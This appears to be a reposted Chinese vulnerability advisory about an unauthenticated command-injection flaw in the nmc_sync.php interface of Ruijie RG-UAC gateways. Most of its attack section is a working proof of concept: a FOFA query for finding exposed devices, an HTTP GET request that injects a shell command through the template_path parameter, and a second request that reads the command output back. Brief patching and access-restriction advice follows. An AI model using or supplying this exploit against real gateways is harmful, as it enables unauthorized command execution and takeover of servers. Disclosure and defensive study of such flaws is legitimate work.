0x01 产品简介

 锐捷RG-UAC系列应用管理网关是锐捷自主研发应用管理产品。

0x02 漏洞概述

  锐捷RG-UAC应用管理网关 nmc_sync.php 接口处存在命令执行漏洞,未经身份认证的攻击者执行任意命令控制服务器权限

0x03 复现环境

FOFA:app=”Ruijie-RG-UAC”

0x04 漏洞复现 

PoC

GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|whoami%20>test.txt|cat HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

验证

GET /view/systemConfig/management/test.txt HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

0x05 修复建议

⼚商已发布漏洞修复程序,请及时关注更新: https://www.ruijie.com.cn

通过防⽕墙等安全设备设置访问策略,设置⽩名单访问

如⾮必要,禁⽌公⽹访问系统

原文地址:https://blog.csdn.net/qq_41904294/article/details/134759305

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_30528.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注